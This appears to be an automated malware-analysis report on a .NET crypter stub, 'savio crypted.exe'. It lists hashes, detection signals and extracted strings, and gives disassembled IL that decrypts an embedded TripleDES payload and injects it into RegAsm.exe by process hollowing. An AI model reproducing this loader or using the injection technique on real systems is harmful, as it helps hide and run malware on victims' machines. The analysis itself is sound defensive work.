File Information hashes and primary classification
File name
4
File size
361.0 KiB
Architecture
DOTNET
- MD5
- 15fffb2ca22665c1d04731a250513f5c
- SHA1
- 6a187370998da0095ffa6c4f8dfe094d501bdc65
- SHA256
- 674f19126e6dcf0ebb2bf9944841c4cd43195f73b006d51826c7c4252a7e2122
- TLSH
- T1577428343dfa501ab173ef698be479aada6fb7733b07645d1090038a4713a41ee8153e
- Imphash
- f34d5f2d4577ed6d9ceec516c1f5a744
- Rich header
- -
Metadata parser-extracted fields
YARA Signatures 2 matching rules
Type.INFO
compiler
MSVC_2012_linker
language
DotNet
Kesakode similarity verdict
SolarMarker
4.5%
KingBong
0.2%
ZeusSphinx
0.2%
1 malware hits
0 library hits
139 clean hits
Anomalies signals worth reviewing
strings:
BigStringHiScore
HugeStringBase64
StringBase64
VeryHugeString
imports:
DotnetCryptoApiUsage
ExternalModule
NativeMethods
integrity:
NoChecksum
Constants identified constants and patterns
No known constants identified.
Strings highest-value extracted strings
| Address | String | Refs | Encoding | Score |
|---|---|---|---|---|
| 0x403371 | fK2NaQxHVYZVTAo+NeLyWNkLgGEftbGesHRcaw9AFdWrg5HoeBHKyOBbcUT+eqzd8nvj1VXTk3lt9PAQZDzMseR1DiDeuCGwiiWWSPHAsUT2Pyy5wzrZ6... | 1 | UTF16 | 210 |
| 0x403315 | iA9B1uKFddQdqiLSSuzvD2GhL1o2Jv+v | 1 | UTF16 | 187 |
| 0x403357 | b2CBFvcQeV4= | 1 | UTF16 | 166 |
| 0x45A38E | RegAsm.exe | 1 | UTF16 | 154 |
| 0x402F80 | ntdll.dll | 1 | UTF8 | 152 |
| 0x45A3A4 | Process creation failed. | 1 | UTF16 | 147 |
| 0x402F73 | kernel32.dll | 1 | UTF8 | 146 |
| 0x45A44C | SetThreadContext failed | 1 | UTF16 | 145 |
| 0x45A3F4 | Failed to read memory | 1 | UTF16 | 145 |
| 0x45A420 | VirtualAllocEx failed | 1 | UTF16 | 142 |
| 0x402FD7 | DebuggerStepThroughAttribute | 1 | UTF8 | 142 |
| 0x402F14 | CompilationRelaxationsAttribute | 1 | UTF8 | 141 |
| 0x402B66 | savio crypted.exe | 1 | UTF8 | 141 |
| 0x402F34 | RuntimeCompatibilityAttribute | 1 | UTF8 | 140 |
| 0x402EC9 | SecurityPermissionAttribute | 1 | UTF8 | 139 |
| 0x4030C3 | DebuggerHiddenAttribute | 1 | UTF8 | 139 |
| 0x4030DB | AsyncStateMachineAttribute | 1 | UTF8 | 138 |
| 0x40328A | CompilerGeneratedAttribute | 1 | UTF8 | 137 |
| 0x4032F7 | UnverifiableCodeAttribute | 1 | UTF8 | 136 |
| 0x4032A5 | StructLayoutAttribute | 1 | UTF8 | 135 |
| 0x403064 | RuntimeEnvironment | 1 | UTF8 | 135 |
| 0x45A3D6 | Context failed | 1 | UTF16 | 133 |
| 0x402EAD | System.Security.Permissions | 2 | UTF8 | 133 |
| 0x4032C6 | MarshalAsAttribute | 1 | UTF8 | 133 |
| 0x402EA2 | FHJASDFJHA | 1 | UTF8 | 133 |
| 0x402EF4 | System.Runtime.CompilerServices | 7 | UTF8 | 132 |
| 0x402DCA | System.Runtime.InteropServices | 8 | UTF8 | 132 |
| 0x402C6D | System.Threading.Tasks | 1 | UTF8 | 132 |
| 0x402D3F | lpProcessAttributes | 1 | UTF8 | 132 |
| 0x403077 | GetRuntimeDirectory | 1 | UTF8 | 132 |
| 0x403197 | CreateDecryptor | 1 | UTF8 | 132 |
| 0x402E71 | baseAddress | 1 | UTF8 | 132 |
| 0x402D94 | lpCurrentDirectory | 1 | UTF8 | 131 |
| 0x403002 | IAsyncStateMachine | 1 | UTF8 | 131 |
| 0x402F60 | DllImportAttribute | 1 | UTF8 | 131 |
| 0x403138 | SymmetricAlgorithm | 1 | UTF8 | 131 |
| 0x402D1F | lpApplicationName | 1 | UTF8 | 131 |
| 0x402DE9 | OutAttribute | 1 | UTF8 | 131 |
| 0x403111 | System.Security.Cryptography | 7 | UTF8 | 130 |
| 0x402E46 | lpNumberOfBytesWritten | 1 | UTF8 | 130 |
| 0x402DB5 | lpProcessInformation | 1 | UTF8 | 130 |
| 0x402D53 | lpThreadAttributes | 1 | UTF8 | 129 |
| 0x4031C8 | CryptoStreamMode | 1 | UTF8 | 129 |
| 0x4032E7 | System.Security | 1 | UTF8 | 129 |
| 0x402E97 | targetPath | 1 | UTF8 | 129 |
| 0x402CE2 | hStdOutput | 1 | UTF8 | 129 |
| 0x4031A7 | MemoryStream | 1 | UTF8 | 128 |
| 0x403226 | BitConverter | 1 | UTF8 | 128 |
| 0x403039 | AsyncTaskMethodBuilder | 1 | UTF8 | 127 |
| 0x403186 | ICryptoTransform | 1 | UTF8 | 127 |
| 0x402E11 | flAllocationType | 1 | UTF8 | 127 |
| 0x4031DF | FlushFinalBlock | 1 | UTF8 | 127 |
| 0x402EE5 | SecurityAction | 1 | UTF8 | 127 |
| 0x4032D9 | UnmanagedType | 1 | UTF8 | 127 |
| 0x402C99 | InjectProcess | 1 | UTF8 | 127 |
| 0x403265 | GetBytes | 1 | UTF8 | 127 |
| 0x40301E | SetStateMachine | 3 | UTF8 | 126 |
| 0x4030B9 | SetResult | 1 | UTF8 | 126 |
| 0x402E00 | lpAddress | 1 | UTF8 | 126 |
| 0x402CED | hStdError | 1 | UTF8 | 126 |
| 0x402FBA | GetResult | 1 | UTF8 | 126 |
| 0x403285 | Kill | 1 | UTF8 | 126 |
| 0x402E92 | data | 1 | UTF8 | 126 |
| 0x402E5D | lpNumberOfBytesRead | 1 | UTF8 | 125 |
| 0x402C28 | WriteProcessMemory | 2 | UTF8 | 125 |
| 0x403276 | GetProcessById | 1 | UTF8 | 125 |
| 0x402DA7 | lpStartupInfo | 1 | UTF8 | 125 |
| 0x402FF4 | <RunStub>d__0 | 1 | UTF8 | 125 |
| 0x402D31 | lpCommandLine | 1 | UTF8 | 125 |
| 0x402B78 | NativeMethods | 1 | UTF8 | 125 |
| 0x402D86 | lpEnvironment | 1 | UTF8 | 125 |
| 0x4030AC | SetException | 1 | UTF8 | 125 |
| 0x4031B4 | CryptoStream | 1 | UTF8 | 125 |
| 0x402D08 | dwProcessId | 1 | UTF8 | 125 |
| 0x402CCC | lpReserved2 | 1 | UTF8 | 125 |
| 0x40316E | PaddingMode | 1 | UTF8 | 125 |
| 0x402BAF | ProcessInfo | 1 | UTF8 | 125 |
| 0x402D14 | dwThreadId | 1 | UTF8 | 125 |
| 0x402FAF | GetAwaiter | 1 | UTF8 | 125 |
| 0x402CAA | lpReserved | 1 | UTF8 | 125 |
| 0x40302E | <>1__state | 1 | UTF8 | 125 |
| 0x402D66 | bInheritHandles | 1 | UTF8 | 124 |
| 0x403102 | Start | 1 | UTF8 | 124 |
| 0x403255 | Array | 1 | UTF8 | 124 |
| 0x402C3B | ReadProcessMemory | 2 | UTF8 | 123 |
| 0x40326E | Process | 1 | UTF8 | 123 |
| 0x40314B | set_Key | 1 | UTF8 | 123 |
| 0x402CBF | lpTitle | 1 | UTF8 | 123 |
| 0x4031EF | ToArray | 1 | UTF8 | 123 |
| 0x403203 | Dispose | 1 | UTF8 | 123 |
| 0x40320B | Marshal | 1 | UTF8 | 123 |
| 0x402C89 | RunStub | 1 | UTF8 | 123 |
| 0x402B9B | Program | 1 | UTF8 | 123 |
| 0x40305D | param0 | 1 | UTF8 | 123 |
| 0x40321A | IntPtr | 1 | UTF8 | 123 |
| 0x40324E | Buffer | 1 | UTF8 | 123 |
| 0x402F92 | FromBase64String | 1 | UTF8 | 122 |
| 0x402D76 | dwCreationFlags | 1 | UTF8 | 122 |
| 0x402BDC | CreateProcess | 2 | UTF8 | 122 |
| 0x402E2C | lpBaseAddress | 2 | UTF8 | 122 |
| 0x403050 | <>t__builder | 1 | UTF8 | 122 |
| 0x402FA3 | TaskAwaiter | 1 | UTF8 | 122 |
| 0x40317A | set_Padding | 1 | UTF8 | 122 |
| 0x4031F7 | IDisposable | 1 | UTF8 | 122 |
| 0x402BA3 | StartupInfo | 1 | UTF8 | 122 |
| 0x40315A | CipherMode | 1 | UTF8 | 122 |
| 0x40325B | BlockCopy | 1 | UTF8 | 122 |
| 0x402BD2 | ValueType | 1 | UTF8 | 122 |
| 0x402CB5 | lpDesktop | 1 | UTF8 | 122 |
| 0x402CD8 | hStdInput | 1 | UTF8 | 122 |
| 0x402E22 | flProtect | 1 | UTF8 | 122 |
| 0x403165 | set_Mode | 1 | UTF8 | 122 |
| 0x402FC4 | System.Diagnostics | 3 | UTF8 | 121 |
| 0x402BF7 | GetThreadContext | 2 | UTF8 | 121 |
| 0x402C08 | SetThreadContext | 2 | UTF8 | 121 |
| 0x402C4D | NtUnmapViewOfSection | 2 | UTF8 | 120 |
| 0x402B86 | ProcessHollowingStub | 4 | UTF8 | 120 |
| 0x4032BB | LayoutKind | 1 | UTF8 | 118 |
| 0x40312E | TripleDES | 1 | UTF8 | 118 |
| 0x4030A2 | Exception | 1 | UTF8 | 118 |
| 0x403108 | get_Task | 1 | UTF8 | 118 |
| 0x402B5D | <Module> | 1 | UTF8 | 118 |
| 0x402BBB | mscorlib | 1 | UTF8 | 118 |
| 0x402C19 | VirtualAllocEx | 2 | UTF8 | 117 |
| 0x402E7D | base64Payload | 2 | UTF8 | 117 |
| 0x402BEA | ResumeThread | 2 | UTF8 | 117 |
| 0x403233 | ToInt32 | 1 | UTF8 | 117 |
| 0x403241 | ToInt16 | 1 | UTF8 | 117 |
| 0x402F8A | Convert | 1 | UTF8 | 117 |
| 0x402C91 | Decrypt | 1 | UTF8 | 117 |
| 0x40309A | Combine | 1 | UTF8 | 117 |
| 0x402BCB | Object | 1 | UTF8 | 117 |
| 0x403153 | set_IV | 1 | UTF8 | 117 |
| 0x4031C1 | Stream | 1 | UTF8 | 117 |
| 0x4031D9 | Write | 1 | UTF8 | 117 |
| 0x40323B | Int32 | 1 | UTF8 | 117 |
| 0x45D453 | <?xml version="1.0" encoding="UTF-8" standalone="yes"?>\r\n<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifes... | 0 | ASCII | 116 |
| 0x402F52 | savio crypted | 1 | UTF8 | 116 |
| 0x402CC7 | misc | 1 | UTF8 | 116 |
| 0x403249 | Byte | 1 | UTF8 | 116 |
| 0x402C68 | Main | 1 | UTF8 | 116 |
| 0x402C84 | Task | 1 | UTF8 | 116 |
| 0x403221 | Zero | 1 | UTF8 | 116 |
| 0x403095 | Path | 1 | UTF8 | 116 |
| 0x4030F6 | Type | 1 | UTF8 | 116 |
| 0x402CA7 | cb | 1 | UTF8 | 116 |
| 0x45A75E | mscoree.dll | 1 | ASCII | 115 |
| 0x402D00 | hThread | 4 | UTF8 | 115 |
| 0x402E3A | buffer | 2 | UTF8 | 115 |
| 0x4030FB | Create | 2 | UTF8 | 115 |
| 0x402DF6 | lpContext | 2 | UTF8 | 114 |
| 0x403015 | MoveNext | 2 | UTF8 | 114 |
| 0x402CF7 | hProcess | 5 | UTF8 | 114 |
| 0x403213 | SizeOf | 1 | UTF8 | 111 |
| 0x402E0A | dwSize | 1 | UTF8 | 111 |
| 0x40308B | System.IO | 3 | UTF8 | 110 |
| 0x402BC4 | System | 13 | UTF8 | 109 |
| 0x402C62 | .ctor | 18 | UTF8 | 109 |
| 0x402E8B | key | 3 | UTF8 | 108 |
| 0x402E8F | iv | 3 | UTF8 | 108 |
| 0x45A67F | System.Security.Permissions.SecurityPermissionAttribute, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b... | 0 | ASCII | 102 |
| 0x402E41 | size | 2 | UTF8 | 99 |
| 0x4024D8 | BSJB | 1 | ASCII | 97 |
| 0x45C288 | savio crypted.exe | 0 | UTF16 | 88 |
| 0x45C2FC | savio crypted.exe | 0 | UTF16 | 88 |
| 0x45C1FA | 000004b0 | 0 | UTF16 | 83 |
| 0x45C136 | VS_VERSION_INFO | 0 | UTF16 | 81 |
| 0x45C2DA | OriginalFilename | 0 | UTF16 | 80 |
| 0x45C258 | 0.0.0.0 | 0 | UTF16 | 80 |
| 0x45C344 | 0.0.0.0 | 0 | UTF16 | 80 |
| 0x45C37C | 0.0.0.0 | 0 | UTF16 | 80 |
| 0x45A563 | *ProcessHollowingStub.Program+<RunStub>d__0 | 0 | ASCII | 74 |
| 0x45C212 | FileDescription | 0 | UTF16 | 73 |
| 0x45C26E | InternalName | 0 | UTF16 | 73 |
| 0x45C35A | Assembly Version | 0 | UTF16 | 71 |
| 0x45C1D6 | StringFileInfo | 0 | UTF16 | 71 |
| 0x45C326 | ProductVersion | 0 | UTF16 | 71 |
| - | !This program cannot be run in DOS mode.\r\r\n$ | 0 | ASCII | 70 |
| 0x45C23E | FileVersion | 0 | UTF16 | 70 |
| 0x45C1B2 | Translation | 0 | UTF16 | 70 |
| 0x45C2B2 | LegalCopyright | 0 | UTF16 | 68 |
| 0x45A662 | WrapNonExceptionThrows | 0 | ASCII | 65 |
| 0x45C192 | VarFileInfo | 0 | UTF16 | 64 |
| 0x4024E8 | v4.0.30319 | 0 | ASCII | 64 |
| 0x45A708 | SkipVerification | 0 | ASCII | 62 |
| - | .text | 0 | ASCII | 59 |
| - | `.rsrc | 0 | ASCII | 58 |
| 0x45A752 | _CorExeMain | 0 | ASCII | 53 |
| - | @.reloc | 0 | ASCII | 52 |
| 0x403313 | 0 | UTF8 | 50 | |
| 0x403312 | 0 | UTF8 | 50 | |
| 0x403311 | 0 | UTF8 | 50 | |
| 0x40250C | #Strings | 0 | ASCII | 48 |
| 0x40253C | #Blob | 0 | ASCII | 44 |
| 0x40252C | #GUID | 0 | ASCII | 44 |
| 0x4026FA | S* \n | 0 | UTF16 | 41 |
Functions high-value functions
Function listings
0x402250 InjectProcess str 5 api 0 imm 21 Unknown
void ProcessHollowingStub.Program.InjectProcess(string targetPath, byte[] FHJASDFJHA) {
ldloca.s local0
initobj ProcessHollowingStub.ProcessInfo
ldc.i4 0x0
stloc local1
br .13
.1:
ldloca.s local2
initobj ProcessHollowingStub.StartupInfo
ldloca.s local2
ldloc local2
call System.Runtime.InteropServices.Marshal.SizeOf
stfld ProcessHollowingStub.StartupInfo.cb
ldarg targetPath
ldnull
ldsfld [System.IntPtr.Zero]
ldsfld [System.IntPtr.Zero]
ldc.i4 0x0
ldc.i4 0x8000004
ldsfld [System.IntPtr.Zero]
ldnull
ldloca.s local2
ldloca.s local0
call [kernel32.CreateProcess]
stloc local3
ldloc local3
brtrue.s .2
ldstr "Process creation failed."
newobj [System.Exception.ctor]
throw
.2:
ldarg FHJASDFJHA
ldc.i4 0x3c
call [System.BitConverter.ToInt32]
stloc.s local4
ldarg FHJASDFJHA
ldloc.s local4
ldc.i4 0x34
add
call [System.BitConverter.ToInt32]
stloc.s local5
ldc.i4 0xb3
newarr System.Int32
stloc.s local6
ldloc.s local6
ldc.i4 0x0
ldc.i4 0x10002
stelem.i4
ldloca.s local0
ldfld ProcessHollowingStub.ProcessInfo.hThread
ldloc.s local6
call [kernel32.GetThreadContext]
brtrue.s .3
ldstr "Context failed"
newobj [System.Exception.ctor]
throw
.3:
ldc.i4 0x0
stloc.s local7
ldc.i4 0x0
stloc.s local8
ldloca.s local0
ldfld ProcessHollowingStub.ProcessInfo.hProcess
ldloc.s local6
ldc.i4 0x29
ldelem.i4
ldc.i4 0x8
add
ldloca.s local7
ldc.i4 0x4
ldloca.s local8
call [kernel32.ReadProcessMemory]
brtrue.s .4
ldstr "Failed to read memory"
newobj [System.Exception.ctor]
throw
.4:
ldloc.s local7
ldloc.s local5
bne.un.s .5
ldloca.s local0
ldfld ProcessHollowingStub.ProcessInfo.hProcess
ldloc.s local7
call [ntdll.NtUnmapViewOfSection]
pop
.5:
ldarg FHJASDFJHA
ldloc.s local4
ldc.i4 0x50
add
call [System.BitConverter.ToInt32]
stloc.s local9
ldloca.s local0
ldfld ProcessHollowingStub.ProcessInfo.hProcess
ldloc.s local5
ldloc.s local9
ldc.i4 0x3000
ldc.i4 0x40
call [kernel32.VirtualAllocEx]
stloc.s local10
ldloc.s local10
brtrue.s .6
ldstr "VirtualAllocEx failed"
newobj [System.Exception.ctor]
throw
.6:
ldc.i4 0x0
stloc.s local11
ldarg FHJASDFJHA
ldloc.s local4
ldc.i4 0x54
add
call [System.BitConverter.ToInt32]
stloc.s local12
ldloca.s local0
ldfld ProcessHollowingStub.ProcessInfo.hProcess
ldloc.s local10
ldarg FHJASDFJHA
ldloc.s local12
ldloca.s local11
call [kernel32.WriteProcessMemory]
pop
ldarg FHJASDFJHA
ldloc.s local4
ldc.i4 0x6
add
call [System.BitConverter.ToInt16]
stloc.s local13
ldloc.s local4
ldc.i4 0xf8
add
stloc.s local14
ldc.i4 0x0
stloc.s local15
br.s .9
.7:
ldarg FHJASDFJHA
ldloc.s local14
ldc.i4 0xc
add
call [System.BitConverter.ToInt32]
stloc.s local16
ldarg FHJASDFJHA
ldloc.s local14
ldc.i4 0x10
add
call [System.BitConverter.ToInt32]
stloc.s local17
ldarg FHJASDFJHA
ldloc.s local14
ldc.i4 0x14
add
call [System.BitConverter.ToInt32]
stloc.s local18
ldloc.s local17
brzero.s .8
ldloc.s local17
newarr System.Byte
stloc.s local19
ldarg FHJASDFJHA
ldloc.s local18
ldloc.s local19
ldc.i4 0x0
ldloc.s local17
call [System.Buffer.BlockCopy]
ldloca.s local0
ldfld ProcessHollowingStub.ProcessInfo.hProcess
ldloc.s local10
ldloc.s local16
add
ldloc.s local19
ldloc.s local17
ldloca.s local11
call [kernel32.WriteProcessMemory]
pop
.8:
ldloc.s local14
ldc.i4 0x28
add
stloc.s local14
ldloc.s local15
ldc.i4 0x1
add
stloc.s local15
.9:
ldloc.s local15
ldloc.s local13
blt.s .7
ldloc.s local10
call [System.BitConverter.GetBytes]
stloc.s local20
ldloca.s local0
ldfld ProcessHollowingStub.ProcessInfo.hProcess
ldloc.s local6
ldc.i4 0x29
ldelem.i4
ldc.i4 0x8
add
ldloc.s local20
ldc.i4 0x4
ldloca.s local11
call [kernel32.WriteProcessMemory]
pop
ldarg FHJASDFJHA
ldloc.s local4
ldc.i4 0x28
add
call [System.BitConverter.ToInt32]
stloc.s local21
ldloc.s local6
ldc.i4 0x2c
ldloc.s local10
ldloc.s local21
add
stelem.i4
ldloca.s local0
ldfld ProcessHollowingStub.ProcessInfo.hThread
ldloc.s local6
call [kernel32.SetThreadContext]
brtrue.s .10
; listing truncated0x402064 DotNetEntryPoint str 3 api 5 imm 0 Unknown
void DotNetEntryPoint() {
ldstr "iA9B1uKFddQdqiLSSuzvD2GhL1o2Jv+v"
call [System.Convert.FromBase64String]
stloc local0
ldstr "b2CBFvcQeV4="
call [System.Convert.FromBase64String]
stloc local1
ldstr "fK2NaQxHVYZVTAo+NeLyWNkLgGEftbGe..c7KJLdW7aAgICsJ0QOkQU76195y+7NA="
stloc local2
ldloc local2
ldloc local0
ldloc local1
call System.Threading.Tasks.Task ProcessHollowingStub.Program.RunStub(string base64Payload, byte[] key, byte[] iv)
callvirt [System.Threading.Tasks.Task.GetAwaiter]
stloc local3
ldloca.s local3
call [System.Runtime.CompilerServices.TaskAwaiter.GetResult]
ret
}0x4020A4 MoveNext str 1 api 2 imm 4 Unknown
void ProcessHollowingStub.Program.<RunStub>d__0.MoveNext(ProcessHollowingStub.Program.<RunStub>d__0 this) {
ldc.i4 0x1
stloc local2
ldarg this
ldfld ProcessHollowingStub.Program.<RunStub>d__0.base64Payload
call [System.Convert.FromBase64String]
ldarg this
ldfld ProcessHollowingStub.Program.<RunStub>d__0.key
ldarg this
ldfld ProcessHollowingStub.Program.<RunStub>d__0.iv
call byte[] ProcessHollowingStub.Program.Decrypt(byte[] data, byte[] key, byte[] iv)
stloc local0
ldloc local0
brtrue.s .1
leave.s .2
.1:
call [System.Runtime.InteropServices.RuntimeEnvironment.GetRuntimeDirectory]
ldstr "RegAsm.exe"
call [System.IO.Path.Combine]
stloc local1
ldloc local1
ldloc local0
call void ProcessHollowingStub.Program.InjectProcess(string targetPath, byte[] FHJASDFJHA)
leave.s .2
stloc local3
ldarg this
ldc.i4 -0x2
stfld ProcessHollowingStub.Program.<RunStub>d__0.<>1__state
ldarg this
ldflda ProcessHollowingStub.Program.<RunStub>d__0.<>t__builder
ldloc local3
call [System.Runtime.CompilerServices.AsyncTaskMethodBuilder.SetException]
leave.s .3
.2:
ldarg this
ldc.i4 -0x2
stfld ProcessHollowingStub.Program.<RunStub>d__0.<>1__state
ldarg this
ldflda ProcessHollowingStub.Program.<RunStub>d__0.<>t__builder
call [System.Runtime.CompilerServices.AsyncTaskMethodBuilder.SetResult]
.3:
ret
}0x402190 Decrypt str 0 api 2 imm 3 Unknown
byte[] ProcessHollowingStub.Program.Decrypt(byte[] data, byte[] key, byte[] iv) {
call [System.Security.Cryptography.TripleDES.Create]
stloc local0
ldloc local0
ldarg key
callvirt [System.Security.Cryptography.SymmetricAlgorithm.set_Key]
ldloc local0
ldarg iv
callvirt [System.Security.Cryptography.SymmetricAlgorithm.set_IV]
ldloc local0
ldc.i4 0x1
callvirt [System.Security.Cryptography.SymmetricAlgorithm.set_Mode]
ldloc local0
ldc.i4 0x2
callvirt [System.Security.Cryptography.SymmetricAlgorithm.set_Padding]
ldloc local0
callvirt [System.Security.Cryptography.SymmetricAlgorithm.CreateDecryptor]
stloc local1
newobj [System.IO.MemoryStream.ctor]
stloc local2
ldloc local2
ldloc local1
ldc.i4 0x1
newobj [System.Security.Cryptography.CryptoStream.ctor]
stloc local3
ldloc local3
ldarg data
ldc.i4 0x0
ldarg data
ldlen
conv.i4
callvirt [System.IO.Stream.Write]
ldloc local3
callvirt [System.Security.Cryptography.CryptoStream.FlushFinalBlock]
ldloc local2
callvirt [System.IO.MemoryStream.ToArray]
stloc.s local4
leave.s .5
ldloc local3
brzero.s .1
ldloc local3
callvirt [System.IDisposable.Dispose]
.1:
endfinally
ldloc local2
brzero.s .2
ldloc local2
callvirt [System.IDisposable.Dispose]
.2:
endfinally
ldloc local1
brzero.s .3
ldloc local1
callvirt [System.IDisposable.Dispose]
.3:
endfinally
ldloc local0
brzero.s .4
ldloc local0
callvirt [System.IDisposable.Dispose]
.4:
endfinally
.5:
ldloc.s local4
ret
}0x402051 ctor str 0 api 1 imm 0 Unknown
void ProcessHollowingStub.NativeMethods.ctor(ProcessHollowingStub.NativeMethods this) {
ldarg this
call [System.Object.ctor]
ret
}0x40211D SetStateMachine str 0 api 1 imm 0 Unknown
void ProcessHollowingStub.Program.<RunStub>d__0.SetStateMachine(ProcessHollowingStub.Program.<RunStub>d__0 this, System.Runtime.CompilerServices.IAsyncStateMachine, ) {
ldarg this
ldflda ProcessHollowingStub.Program.<RunStub>d__0.<>t__builder
ldarg arg0
call [System.Runtime.CompilerServices.AsyncTaskMethodBuilder.SetStateMachine]
ret
}0x4024D1 ctor str 0 api 0 imm 0 Unknown
void ProcessHollowingStub.Program.ctor(ProcessHollowingStub.Program this) {
ldarg this
call void ProcessHollowingStub.NativeMethods.ctor(ProcessHollowingStub.NativeMethods this)
ret
}0x402138 RunStub str 0 api 3 imm 1 Clean
System.Threading.Tasks.Task ProcessHollowingStub.Program.RunStub(string base64Payload, byte[] key, byte[] iv) {
ldloca.s local0
ldarg base64Payload
stfld ProcessHollowingStub.Program.<RunStub>d__0.base64Payload
ldloca.s local0
ldarg key
stfld ProcessHollowingStub.Program.<RunStub>d__0.key
ldloca.s local0
ldarg iv
stfld ProcessHollowingStub.Program.<RunStub>d__0.iv
ldloca.s local0
call [System.Runtime.CompilerServices.AsyncTaskMethodBuilder.Create]
stfld ProcessHollowingStub.Program.<RunStub>d__0.<>t__builder
ldloca.s local0
ldc.i4 -0x1
stfld ProcessHollowingStub.Program.<RunStub>d__0.<>1__state
ldloca.s local0
ldfld ProcessHollowingStub.Program.<RunStub>d__0.<>t__builder
stloc local1
ldloca.s local1
ldloca.s local0
call System.Runtime.CompilerServices.AsyncTaskMethodBuilder.Start
ldloca.s local0
ldflda ProcessHollowingStub.Program.<RunStub>d__0.<>t__builder
call [System.Runtime.CompilerServices.AsyncTaskMethodBuilder.get_Task]
ret
}No library functions identified.